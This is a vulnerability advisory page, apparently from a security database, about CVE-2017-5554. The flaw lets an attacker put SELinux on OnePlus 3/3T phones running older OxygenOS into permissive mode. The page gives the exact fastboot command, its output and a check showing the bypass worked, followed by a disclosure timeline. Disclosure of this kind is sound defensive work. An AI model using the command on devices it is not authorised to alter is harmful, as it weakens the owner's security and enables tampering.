Lucene search
RootSSV:93100HistoryMay 12, 2017 - 12:00 a.m.
OnePlus 3/3T OxygenOS SELinux Security Bypass(CVE-2017-5554)
2017-05-1200:00:00
Root
www.seebug.org
28
0.004 Low
EPSS
Percentile
74.8%
Products
- OnePlus 3T
- OnePlus 3
Vulnerable Version
- OxygenOS prior to 4.0.2
Technical Details
The attacker can reboot a OnePlus 3/3T device into the fastboot mode, which could be done without any authentication. A physical attacker can press the “Volume Up” button during device boot, where an attacker with ADB access can issue the adb reboot bootloader command. Then, the attacker can put the platform’s SELinux in permissive mode, which severely weakens it, by issuing:
fastboot oem selinux permissive
...
OKAY [ 0.045s]
finished. total time: 0.047s
....
OnePlus3:/ $ getenforce
Permissive
OnePlus3:/ $
Timeline
- 01-Mar-17: Added as ALEPH-2017001.
- 22-Jan-17: CVE-2017-5554 assigned.
- 18-Jan-17: CVE ID requested.
- 11-Jan-17: Public disclosure.
Related
cve
cve
CVE-2017-5554
2017-01-23 07:59:00
nvd
nvd
CVE-2017-5554
2017-01-23 07:59:00
prion
prion
Authentication flaw
2017-01-23 07:59:00
cvelist
cvelist
CVE-2017-5554
2017-01-23 06:49:00